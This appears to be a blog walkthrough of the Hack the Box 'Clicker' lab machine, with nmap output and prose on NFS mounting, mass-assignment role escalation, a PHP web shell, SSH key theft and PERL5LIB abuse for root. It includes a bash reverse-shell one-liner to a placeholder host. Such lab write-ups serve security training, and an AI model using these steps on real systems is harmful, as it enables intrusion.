In this post, I would like to share a walkthrough of the Clicker Machine from Hack the Box

This room will be considered a Medium machine on Hack the Box

What will you gain from the Clicker machine?

For the user flag, you will need a website featuring a game reminiscent of Universal Paperclips. Through meticulous analysis, I’ll uncover a mass assignment vulnerability, employing innovative techniques such as newline injection and SQL injection to circumvent filters and elevate my role to admin status. Subsequently, I’ll exploit a file write vulnerability to establish a web shell and gain execution privileges on the system. To further advance, I’ll identify a SetUID binary belonging to the next user and exploit it to access their SSH key.

As for the root flag, you need to abuse the bug on the manipulation of Perl environment variables

For those who want to learan or improve CyberSecurity skills especially Red Teaming and Blue Team, You can use the link https://affiliate.hackthebox.com/gnfp67dzy7p0 to support me

Academy link can be found https://affiliate.hackthebox.com/wanmohdariffwanmohdrosdi6259vvv

Information Gathering on Clicker Machine

Once we have started the VPN connection which requires a download from Hackthebox, we can start

┌─[darknite@parrot]─[~/Documents/htb/Clicker]
└──╼ $ nmap -sV -sC 10.10.11.232 -oA initial 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-25 21:32 EDT
Nmap scan report for 10.10.11.232
Host is up (0.16s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 89d7393458a0eaa1dbc13d14ec5d5a92 (ECDSA)
|_  256 b4da8daf659cbbf071d51350edd81130 (ED25519)
80/tcp   open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Did not follow redirect to http://clicker.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      39593/udp6  mountd
|   100005  1,2,3      40478/udp   mountd
|   100005  1,2,3      54941/tcp   mountd
|   100005  1,2,3      59945/tcp6  mountd
|   100021  1,3,4      35535/tcp   nlockmgr
|   100021  1,3,4      46513/tcp6  nlockmgr
|   100021  1,3,4      50096/udp   nlockmgr
|   100021  1,3,4      53836/udp6  nlockmgr
|   100024  1          44540/udp   status
|   100024  1          47015/tcp6  status
|   100024  1          51776/udp6  status
|   100024  1          60587/tcp   status
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/tcp6  nfs_acl
2049/tcp open  nfs_acl 3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.14 seconds
┌─[darknite@parrot]─[~/Documents/htb/Clicker]
└──╼ $ 

Let’s access the website interface

Sadly, nothing is interesting to investigate further unless to register a new account and login using the account that we registered early

Therefore, we should be registering a new account and accessing the website using the account we created which leads to the interface as shown above.

The profile information will look as shown in the screenshot above.

For the play interface, it would appear something like the above.

Let’s analyze the outcome via burpsuite and there’s no odd on the response.

Showmount enumeration on the machine

Therefore, let’s execute the showmount on the clicker.htb which we sighted the /mnt/backups folder

Firstly, we are required to create the folder exactly like that we found using showmount command

As a result, let’s mount the folder into our attacker’s machine

Inside the folder, there’s a zip file which we can further analyze on our attacker’s machine

Let’s copy the file into our attacker’s machine

We should disable the mount function so that it will not affect the machine

Let’s extract the zip file

There are a lot of PHP files which we can investigate further

Analyze the PHP file extension on the machine

After analyzing the PHP source code, we found that we can escalate to the admin role in the website application itself.

We can add a function such as &role/**/=Admin after the level function as it might provide us the administrative access.

At first, it didn’t work which caught me off-guard on the attack technique but it suddenly worked when you re-login the home interface.

The interface should be shown in the screenshot above.

However, there is nothing on the Administrator panel

Therefore, let’s put our PHP simple shell after the role function

After that, we should export the function as a PHP file extension.

Finally, we got a command injection when we tried to run the “id” command

Let’s start our listener on our attacker’s machine

We can execute the reverse shell command which would make the easier to retrieve the shell on our machine.

P/s: We can also use the common bash shell such as bash -i /dev/tcp/<IP>/<PORT> 0>&1 but we are required to URL encode

Enumeration on www-data to user access

A black screen with a white border

Description automatically generated with medium confidence

Boom! We have successfully retrieved the shell as www-data

I notice there are only 2 users that can use the bash

There are a few files assigned to Jack that we can investigate further.

One of the files contains some instructions on the web application management’s task

However, the binary can be easily read as usual.

Let’s see the extension of the binary

As a result, we should download the binary to our machine.

As shown in the screenshot above, it show that the download is a success.

We also can analyze the binary with the strings command

The outcome shows a MySQL command which we can run on the machine.

I didn’t expect the MySQL command to work but let’s continue with this path before moving forward with a different path.

There are a few databases on the MySQL but clicker have caught my attention compared to other databases.

There are a few players that have been stored in the database but it could be a rabbit hole on the machine.

It look promising when i try to execute the command above.

At last, we managed to retrieve the SSH private key which we can use to obtain access to the machine.

We can try accessing the only user that we found earlier which is jack with the SSH private key and it works.

We can read the user flag by typing the command “cat user.txt”

Escalate to Root Privileges Access

A computer screen with green text

Description automatically generated

As usual, we can execute the basic command to retrieve some malicious file which in this case, it’s monitor.sh file

From my understanding of the bash source code, we can abuse the PERL5LIB which can be read here

We can use the command shown inside the page here to execute the command injection on the machine.

As shown in the screenshot above, /bin/bash has still not been given the binary permission to escalate to root yet.

Therefore, let’s give the bash file the binary permission so that we can escalate to root

As shown above, the bash file has been given the binary permission which is highlighted in red colour.

Finally, we can escalate to root access.

We can read the root flag by typing the “cat root.txt” command

Categories:

No responses yet

Leave a Reply

Your email address will not be published. Required fields are marked *